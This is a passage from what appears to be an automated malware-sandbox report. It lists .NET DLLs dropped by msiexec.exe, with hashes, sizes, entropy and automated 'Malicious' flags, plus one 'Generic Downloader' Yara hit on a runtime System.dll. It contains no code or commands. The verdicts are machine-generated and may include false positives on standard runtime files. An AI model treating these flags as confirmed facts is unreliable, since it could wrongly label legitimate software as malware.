                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ZJ92mRTaW/pBqWEFvWecX6HRN7NtFDR9z7WJFcHv:Zv8v0WNfl9zaFcP
                                                                                                                                                                                                                                                                                                                                  MD5:EC4FF753DA77ED8B2886F1E405A35DBB
                                                                                                                                                                                                                                                                                                                                  SHA1:5EFD154E9DB2D9F5428ED5C7E2CD2E7A6C284641
                                                                                                                                                                                                                                                                                                                                  SHA-256:AA213B5B4B02F04217B98064E0E6C8E67D4CF7297035578A8DEFF06044BC9427
                                                                                                                                                                                                                                                                                                                                  SHA-512:217DCD7F7BAD548BCDBFFAA24B41A56C9CE42BDBF6A08EB1726B58D3CAA0495D8492B3843EA19143D09B7B25B33AA245F45DBF88CC59CA476FBAF9736D977B40
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.818215198409436
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:bRif6GCuqMffMIMWsmCWbkX6HRN7g55f9R9zrJRu/NjB:bR9ufnsWk5X9z2/Nt
                                                                                                                                                                                                                                                                                                                                  MD5:DA63DF1047EC11E67E31B84DA75139F8
                                                                                                                                                                                                                                                                                                                                  SHA1:9806EB4FAE997FD0DBDC8DEEB08A1224B6824DEF
                                                                                                                                                                                                                                                                                                                                  SHA-256:FA32A8375FA17F7B2F2ED34B1ED45330A2506DAF0FAE769B9CBC956E36F38DE6
                                                                                                                                                                                                                                                                                                                                  SHA-512:A605F33DE535ADD828B51D636A1D93D642D5D6C998A9A41C527EB62C57C04C346938D86AFFA14A4ADF7B891B7CD3E8E859E7027BC056C8F40E10D3CAB5B348BF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):80144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.549870749231894
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:5Tc5R35Dx0ibqDo9suGxd1JARH7AWl7iLzn:5A5R3YHDo9gxd12KWl7M7
                                                                                                                                                                                                                                                                                                                                  MD5:217C90BF12B38AEDA557263C7AF4A306
                                                                                                                                                                                                                                                                                                                                  SHA1:56390B1AC126C7BD229EC1B221E7E78BCD35B92F
                                                                                                                                                                                                                                                                                                                                  SHA-256:31F5BB9877E0777AC208A34CB63CF97E4146BF9DDBBB0B8CB451633E7C543F9E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E34AF975E3189846804F2716CDBCD6FFE8D06A6A1D41C9462DFF64DFB79642EE84C944A064E35AD94E9E65B10F0B33CF604928639586137F1F00551AEDD87D7B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):351520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.644714489495638
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:rEfCVr/c2WYI0De//sQMd2uAIgeUow53HIt:wf8r02WpMHenlK
                                                                                                                                                                                                                                                                                                                                  MD5:416F763F3F8A2F17177E2609FEEE284A
                                                                                                                                                                                                                                                                                                                                  SHA1:43B261CB27A461949CA6A9BC723696A6CB7A30BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:C62C23429BEE731709EDA16E1986C9BD089B81989E82F9F61D532F815F8C732E
                                                                                                                                                                                                                                                                                                                                  SHA-512:A55B0B2B5196703127A0F36C00021064CCE170D428FD12EFFDA77B09D11932BBA3A92A9FBD8D3CD15F6088FEEF56A65D27E59EE87D4CED59318CF2F62C0CD849
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676422570015763
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:35uFRdU+WzGiWoYA6VFHRN7mhdcTR9z66Q1j:JuFRmqUFClmhmV9zQ
                                                                                                                                                                                                                                                                                                                                  MD5:CF735B049EDD9AECEA6929479D438AB9
                                                                                                                                                                                                                                                                                                                                  SHA1:FE6F3DF934C54DCB28C6C29CD82C42746503031A
                                                                                                                                                                                                                                                                                                                                  SHA-256:EE06ADA630D4799FA5F16A7185890CB660E43ACCF1D377CBA27A3E9C5F83F326
                                                                                                                                                                                                                                                                                                                                  SHA-512:A042CDB90B117777C05DD62E69979F9576682ACE8D8965D1502BACEC5539B36E62AF163EC84C2A1C64E8F55ACFF25E6154FD16C7D52313916080B90B98AD63CF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.822499066467974
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:D2Cdc393WtyGWbjX6HRN7in9R9zrJRY0le5:D21JDrWS9zQ0l8
                                                                                                                                                                                                                                                                                                                                  MD5:A61FE4F1CF1323421CD72519E4526BC8
                                                                                                                                                                                                                                                                                                                                  SHA1:59A8697119DD4287022B2ED4C0513EA22F3BB29C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D8D708352C3B96D1AA193FFBD6F764A701EBFC979C700190494134E0E54F7B3
                                                                                                                                                                                                                                                                                                                                  SHA-512:6A565BE87005BEF075C7C6F0B13953794D52B861B5D40A74D3CCCA9A7813DE18195234827A83A4D38BFDB1CA64A712EA41A87A7A2A30023F45F624022A3DD4E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.684498329756475
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:ZZcxU+oWt5y4JSLFUA5JDHyFuc97Qk7Y32QttzX/XHXJREYcP+uLFClNP69zB:ZZN/iDALyFFQk7Y32OJPX7cP9piNuzB
                                                                                                                                                                                                                                                                                                                                  MD5:732613D07CF169180B7874BF3CA02EA8
                                                                                                                                                                                                                                                                                                                                  SHA1:0554B11B5E3C4A61823E9D7F74F71B0EA4A6678E
                                                                                                                                                                                                                                                                                                                                  SHA-256:6192CFA1614ECA1B992CFBA155FF9EF3D32C3A7F642912BBB502F0001DE246B5
                                                                                                                                                                                                                                                                                                                                  SHA-512:B60315B4C309A29C9E174A81464F528309155744FC170FD229A65ABEABAA1E035E2AFA7857D30BFD1586A80A1E15ED6807068C41154A32E3CD09E76BBE9ED93D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.711582753143812
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:DEVND8hxWVwo9W7YA6VFHRN7gD2R9zza+t1fY:D+u+2FClsK9zZ1fY
                                                                                                                                                                                                                                                                                                                                  MD5:31AC4E4AAED9264FA20A5E21B3393F7E
                                                                                                                                                                                                                                                                                                                                  SHA1:52A0AC2D9D0A5C099F6B490A3CED86CD5D04A446
                                                                                                                                                                                                                                                                                                                                  SHA-256:12EC2E14354B9F25143D4A6FE3DF9ABE0EAC379918B85BD7532D10C30E30423F
                                                                                                                                                                                                                                                                                                                                  SHA-512:EB15E6A6F18E89A8D4094C01FBAAC5DDB837794AB598D7D4176F98B8B0E0F0581D60FBBA8C97F0373E9817C89F8193A3E0C57BA88EC69F88F8A929A09879690F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.684087527310445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ClyaMtLx2vJWE2SW3W+WxNzx95jmHnhWgN7acWNCmyttuX01k9z3AOV8sQR:GyaMtF0JWE2SWmFX6HRN7nnSR9zdV8hR
                                                                                                                                                                                                                                                                                                                                  MD5:D4DC0B9D603E0AC51FA099E12261E82D
                                                                                                                                                                                                                                                                                                                                  SHA1:C9D7877F32BA92F1D63F35999A9270CFDFBA6FCC
                                                                                                                                                                                                                                                                                                                                  SHA-256:5798AB51F67A1731E67A8A356763CB5C02BDA618DD575AED51DC6272096BB218
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F2999E1522ECD1EA45FE0BD2C1484C4A3E11E91D7E728D1358E7F9A2FE3B1144302A2DACCFFB0F97185F80C6E7F54A959D550F806E154FFB9E7C0B408A4B95C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.667070680792912
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:BhMvUCh9W1Y4WOArWxNzx95jmHnhWgN7agWUmMfKUSIX01k9z3ARqK:AL9W1Y4WOAEX6HRN79mW2IR9zoH
                                                                                                                                                                                                                                                                                                                                  MD5:19645202783866DF23C6D8746CE1196A
                                                                                                                                                                                                                                                                                                                                  SHA1:6D8293BA6B41247BA090E3ACB3AD98F4267AF44C
                                                                                                                                                                                                                                                                                                                                  SHA-256:E7065641210FAB4636FCC3B117E4E15A584838E71A4D0B3835D6378C78937465
                                                                                                                                                                                                                                                                                                                                  SHA-512:00A5FC30B4DDE85306BDDC509FD539F4C7A17C2A032EF65F620697C158D0A11DF5F06CF0FD1A6886B88D8EF7EB53321CE18B9ADFC5B6EE248291C09BDA411EE9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.352093179803691
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:P125qkxK67ex4FCRunW1wAWEYA6VFHRN7JtHNsAR9zqo:NKLmAWFCl3ts89zL
                                                                                                                                                                                                                                                                                                                                  MD5:FB77B8FA47F57C039EC3202C86752842
                                                                                                                                                                                                                                                                                                                                  SHA1:22138F3686EB4AE26D4B6212EC91B1441F918AE0
                                                                                                                                                                                                                                                                                                                                  SHA-256:0B8B80E022A7A6F46E61CC434658AFC00F72631E4303AC5FA2237DBA99925098
                                                                                                                                                                                                                                                                                                                                  SHA-512:9685C0BECDEB79531BD37A40A4C1F7FB230706AD88AD25F3A1E930D59408DA370D050707B47D4BEC72E8C4598C080C2E01E415E94DCC8E14ADA3F4ACD9E545D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7385136944866995
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+rKxzzhLW7MfEqHWqWxNzx95jmHnhWgN7aoW3zAcZQZfKUSIX01k9z3ARq7fG7yu:+ezdLW7MfEqHW5X6HRN7l2IR9zoqG9
                                                                                                                                                                                                                                                                                                                                  MD5:618450D16A5E2A9E8892A0A08748115B
                                                                                                                                                                                                                                                                                                                                  SHA1:F282DDC839FEE8E157C8F9453B2C447CF2292E5A
                                                                                                                                                                                                                                                                                                                                  SHA-256:84537A54CCA9AA87F0246E71E75A77124C90B4602A979C111368848FD975B591
                                                                                                                                                                                                                                                                                                                                  SHA-512:8AB0AC9D1BC47D5378B70D38D8EC86B08EB1CC0FE9A1167BA3DC16CE49F1CEBE47D410A59A9F2A60F699773D0D745625C348744B3114300D03B6E0F507E77757
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.768329397272433
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RaxphW/vdWXpWjA6Kr4PFHnhWgN7agWacdhHssDX01k9z3AGWaEj:yphW/vdWXYA6VFHRN78dFDR9z7WPj
                                                                                                                                                                                                                                                                                                                                  MD5:D0EB97936EF83C560D6C32F8A01DD0B4
                                                                                                                                                                                                                                                                                                                                  SHA1:689484E237A3C1BF34DCBD30349EF026D25EB9E6
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9E7AB3E5CE5993C393E1628A9390C3C676661FADD15B8AF18DF8F37D4E7F0D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:C395BB74991B8C3F8590CF339920CF283A5887C8330B41FCB4C2AA958F25970CD67D037CFC5A20B291E8F088EF2580BBCB9AC641AA97A2E4DC965D6B4805DAC6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.651913199525005
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MW0aeWJ4nTLVGQYA6VFHRN7NN/7R9zCMZ:3J4nPlFCljF9zL
                                                                                                                                                                                                                                                                                                                                  MD5:0059E13D67A0A703782F6761903F9993
                                                                                                                                                                                                                                                                                                                                  SHA1:F278429223A4993D3757465A5CDEB11679708C03
                                                                                                                                                                                                                                                                                                                                  SHA-256:186782FBF3EEE0E17A95D06769548771B62252BDC412BE8F83A582D091A8DBD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:CDDBBBC503FA1C2D98C267CDC1A31ED052A8E5AE870924ECDE9408D044F571C9F701FE85E2DB7AEF5005B6B262F8BCBE08DF00D2E35BCAC25361987E362E6A3C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.724803734854889
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:J/lRiA8DrHDWBVvWrjcYA6VFHRN7cVXC4deR9zVjxqmt:PP804cFClcVXC4dC9zVjYK
                                                                                                                                                                                                                                                                                                                                  MD5:D8BD70EB45B4B115C2ED458D8A5E756A
                                                                                                                                                                                                                                                                                                                                  SHA1:1FE7563C6A18BE3D0E59FC0CDFF54495C5A15F42
                                                                                                                                                                                                                                                                                                                                  SHA-256:4FA30F4343142ABC37495DC2DF892A2B357C00C9FE5389B5E3D3566A888F75E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:68233A9CD8C4524C57038569E6D6770E03B8A6DF95F31463753E4BA4834D3CE9FE87F458B27B282E4425CB453AB59287D03E0B5824075B5B477E3EE184095F2C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.785986414151434
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MVZNGfjiWeEsWRYA6VFHRN7EvQFcTR9z6TlLOH:6NGpbFClEvQeV9zalLOH
                                                                                                                                                                                                                                                                                                                                  MD5:E4C4592017D5132F245A622B8F40970E
                                                                                                                                                                                                                                                                                                                                  SHA1:EDDF6A290E9250B5B6668E00101F6F48D23A4D4A
                                                                                                                                                                                                                                                                                                                                  SHA-256:08C59884C4662F992985FBC992F196961BA9D8D3DC2CB3BF3E6E3602426B2F54
                                                                                                                                                                                                                                                                                                                                  SHA-512:46A12FAE6D250D3D8C75016B41FC6CBCE03512419D989B0F9C3206FDFA2CE4E68FA9A0B437ABDB7B17EAAA68841139EF0AFC50696B83D0FD49917B8B99F83AC9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.62112689223517
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JmiLgTJNTDxhkcWplvW5MWxNzx95jmHnhWgN7agW5wIAgfcMbnoQNpX01k9z3Abg:Yi8rdhbWplvW5TX6HRN7xI/7R9zCng
                                                                                                                                                                                                                                                                                                                                  MD5:AC8C00A6747DE5226C137D208C4F182B
                                                                                                                                                                                                                                                                                                                                  SHA1:215E2563CA1AE5FDD1DFABCDA2D4281451C37A03
                                                                                                                                                                                                                                                                                                                                  SHA-256:55F9EDDE671BB0B598826186B23DC864753770B65F7EBE53D3AC3D86512A1B3A
                                                                                                                                                                                                                                                                                                                                  SHA-512:31149C242D6E3CB429E9E3F84C4DE13782C82788D189217ABCFE9A058D7CEE871B8B682D49531D912F6F58DE325136BBA1C073FF1D3F5E14E56ADBFEA57E761C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.196087974091141
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qV/Mc95qohA8bhUVGdOQgWKwjsWlYA6VFHRN721DX+iR9zZjES:qV0chOkrFCl+DuO9z9ES
                                                                                                                                                                                                                                                                                                                                  MD5:FD9D85F47840B07B63FAC3C7B1A67ACF
                                                                                                                                                                                                                                                                                                                                  SHA1:09B9728960F9A81B3D67B3F1D9E6E19C0247014E
                                                                                                                                                                                                                                                                                                                                  SHA-256:D563E81C9FEEEF2C1E30A1DB45C95A3CE2A1BC18693CE30289E466D6E1ABC9D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:FA1F20E27EA6A51EEDE46C418792790925E16CC752155B72412312A4A14DEDFCCF1F032C42A7A17B298B8DA5B6FE98DCCC43C062C41C4786EBEC01340FDF12D8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):50960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.747090092923577
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:eQuoy1c6A2ZX8TRNH5JVbOd502zq1TntVBFFClwl9zx:eQuoO3ZX8Q5jzC3BTiw3zx
                                                                                                                                                                                                                                                                                                                                  MD5:C4B42F4015DB97630DAC03F6B12EA124
                                                                                                                                                                                                                                                                                                                                  SHA1:C1ECEAE6CB9C4F6E39F4F582052E3824DB2A5323
                                                                                                                                                                                                                                                                                                                                  SHA-256:A0CAE7A8FF1A44A04215B2FEE19D73B6D9351A7DCEAF17E25D8DC72E5D0A5D60
                                                                                                                                                                                                                                                                                                                                  SHA-512:C75AC92E9F72D016BEDC60AB2FD49C3E21C4C8AE44665FA80613AEEF1A669191F1182EBBEAEF9EDA76A77980930BAE4E5DF238D9CE47689AF781092C298D6CD1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.687937690598966
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:vpmduasEWQ+E9ZRWVEcWWUYA6VFHRN7rpR9z+ptz/nk:v0dJnP8UFClrD9zWZ/k
                                                                                                                                                                                                                                                                                                                                  MD5:843DB412D5B8F71F10EDD73561B4804B
                                                                                                                                                                                                                                                                                                                                  SHA1:C33B33AD7A29C9E981A049B1DA3E6A793F5CE034
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF02BFB85E43E968B8095065809715D40039841AA1CAAACFEACB9A303C35F93A
                                                                                                                                                                                                                                                                                                                                  SHA-512:AADD18D36BAF1D40309B2B3D128D770AEC298A7F0498C17D5BEFB85ACD32650547D2FB6CA58134221A335DFADBFE1C4B925C14A65A2D971E8F58442EE59013ED
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.459775574843526
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:SOQWvhW/WYnO/VWQ4SWc0NsxZAqnajT9CJIC:SjWvhWvUsNs/Al39AL
                                                                                                                                                                                                                                                                                                                                  MD5:681C84FB102B5761477D8DA2D68CD834
                                                                                                                                                                                                                                                                                                                                  SHA1:FD96CF075A956FBC2B74E1ECC3E7958163B58832
                                                                                                                                                                                                                                                                                                                                  SHA-256:F0F7CB2A9FFCCB43400DB88D6BF99F2FCC3161DE1AC96C48501D4D522C48C2CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:C41A62F8D10290215B8A7F0DDCC27A1CF12A7453C2DAABEF75BD2CE87C4FFC87D74EDC8CAA1771BEDA0BFA26249CFE3C94D4AF50B22A5DECB6D282BD8A2C4BDD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.499619700582879
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:L6WvhWFWYnO/VWQ4SWssAtkqnaj6M07i5CK:+WvhW1UslWMui57
                                                                                                                                                                                                                                                                                                                                  MD5:039D612693E56CCF32AE81C99443EA77
                                                                                                                                                                                                                                                                                                                                  SHA1:0487AA5E7D283A8840F3005D1E24E8C9ED140974
                                                                                                                                                                                                                                                                                                                                  SHA-256:4E978EE035B72032D0B7693E09EED6E112DCED6965780BC3E6B8E024EA2366AB
                                                                                                                                                                                                                                                                                                                                  SHA-512:FFA56C73E977FFCEF7890AB6C3EC52E9827AF28B0552F11C48BB7CA16D37C2B7069FB7E03CEFB89F8679E3755BCC8C47344D0D9B91416C6D92CA7DB28C20240A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.308560743366262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
